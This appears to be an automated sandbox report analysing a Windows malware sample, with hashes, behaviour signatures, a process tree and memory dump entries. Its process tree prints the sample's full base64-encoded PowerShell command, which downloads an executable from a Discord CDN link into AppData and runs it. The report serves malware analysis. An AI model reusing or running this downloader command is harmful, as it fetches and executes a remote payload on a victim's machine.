Analysis
-
max time kernel
152s -
max time network
187s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
-
submitted
05-12-2022 06:25
General
-
Target
599e17a85afe5abfc5e7f0210a5d76241bc5304d4ff1fd6f5376bd2aa859a3c6.exe
-
Size
6KB
-
MD5
224ad38879a55ecc379737225d02b85c
-
SHA1
260cfe1499c16b381698a462f0997b105add2e9d
-
SHA256
599e17a85afe5abfc5e7f0210a5d76241bc5304d4ff1fd6f5376bd2aa859a3c6
-
SHA512
fd781fee26055eeb4eed26058146a5423684543099313c8d6f6c4f157e6484c89cc2d7180f5b82555ce5eb194e595bbb5ce4da8f3e0eba7b1bca27a2a66ce335
-
SSDEEP
96:I8J79BlBCF5NTcofNVIIKtgNtUqpkK77mc359ed3ojXrl:z9BuFDNNVI5ONtUqpkK77Rzeda
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\599e17a85afe5abfc5e7f0210a5d76241bc5304d4ff1fd6f5376bd2aa859a3c6.exe"C:\Users\Admin\AppData\Local\Temp\599e17a85afe5abfc5e7f0210a5d76241bc5304d4ff1fd6f5376bd2aa859a3c6.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAbgBpACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANAAyADQANwA3ADQAMQA3ADYANgA4ADgAMAA4ADcAOAA1AC8AMQAwADQAMgA0ADcANwA1ADQANAAwADgAOQAzADIANQA2ADUAOQAvAGwAYwBvAG0AcABsAGMAbQBwAG8ALgBlAHgAZQAnACwAIAA8ACMAZgBwAHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBiAGIAawAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBnAHoAYQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBhAHMAZABzAGEAZABzAGEAZABzAGEALgBlAHgAZQAnACkAKQA8ACMAZwBsAHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcwBmAHQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGcAagBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGEAcwBkAHMAYQBkAHMAYQBkAHMAYQAuAGUAeABlACcAKQA8ACMAcgBjAGsAIwA+AA=="2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/472-56-0x0000000000000000-mapping.dmp
-
memory/472-58-0x000007FEF3F50000-0x000007FEF4973000-memory.dmpFilesize
10.1MB
-
memory/472-59-0x000007FEF33F0000-0x000007FEF3F4D000-memory.dmpFilesize
11.4MB
-
memory/472-60-0x000000001B710000-0x000000001BA0F000-memory.dmpFilesize
3.0MB
-
memory/472-61-0x00000000024A4000-0x00000000024A7000-memory.dmpFilesize
12KB
-
memory/472-62-0x00000000024AB000-0x00000000024CA000-memory.dmpFilesize
124KB
-
memory/472-63-0x00000000024AB000-0x00000000024CA000-memory.dmpFilesize
124KB
-
memory/1076-54-0x0000000000EA0000-0x0000000000EA8000-memory.dmpFilesize
32KB
-
memory/1076-55-0x000007FEFC2B1000-0x000007FEFC2B3000-memory.dmpFilesize
8KB